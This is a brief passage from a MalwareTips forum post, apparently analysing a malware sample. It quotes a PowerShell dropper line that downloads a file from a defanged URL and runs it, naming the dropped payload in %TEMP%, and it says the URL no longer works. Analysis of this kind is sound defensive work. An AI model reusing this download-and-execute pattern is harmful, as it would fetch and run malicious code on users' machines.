(New-Object System.Net.Webclient).DownloadFile(''hXXp://saudail-alpin.no/point.gkp'',$path);
Start-Process $path;


=> %TEMP% \nappinm.exe : payload

The url doesn't work anymore​
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top